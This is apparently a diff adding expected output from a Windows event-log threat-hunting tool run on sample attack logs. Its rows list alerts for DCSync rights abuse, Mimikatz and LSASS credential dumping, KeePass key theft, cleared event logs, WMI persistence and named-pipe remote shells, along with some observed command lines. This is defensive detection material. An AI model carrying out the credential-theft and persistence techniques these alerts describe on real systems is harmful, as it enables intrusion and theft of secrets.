+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\user01\Desktop\WMIGhost.exe""   :  Path: C:\Users\user01\Desktop\WMIGhost.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\scrcons.exe -Embedding  :  Path: C:\Windows\System32\wbem\scrcons.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe  :  Path: C:\Windows\Sysmon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding  :  Path: C:\Windows\System32\wbem\unsecapp.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:44.045 +09:00,IEWIN7,1,informational,Process Creation,"Command: sysmon  -c sysmonconfig-18-apr-2019.xml  :  Path: C:\Users\IEUser\Desktop\Sysmon.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell  :  Command: Powershell  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery  :  Command: ""C:\Windows\system32\whoami.exe""  /user  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1088,technique_name=Bypass User Account Control  :  Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc""   :  Path: C:\Windows\System32\mmc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery  :  Command: ""C:\Windows\system32\whoami.exe""  /user  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading  :  Command: ""C:\Users\IEUser\Downloads\Flash_update.exe""   :  Path: C:\Users\IEUser\Downloads\Flash_update.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading  :  Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe""   :  Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: cmd.exe /A  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading  :  Command: KeeFarce.exe  :  Path: C:\Users\Public\KeeFarce.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx
+2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,System log file was cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
+2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
+2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
+2019-04-29 01:29:42.988 +09:00,IEWIN7,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
+2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
+2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Malicious Named Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:21.539 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe""  /all  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:55.472 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
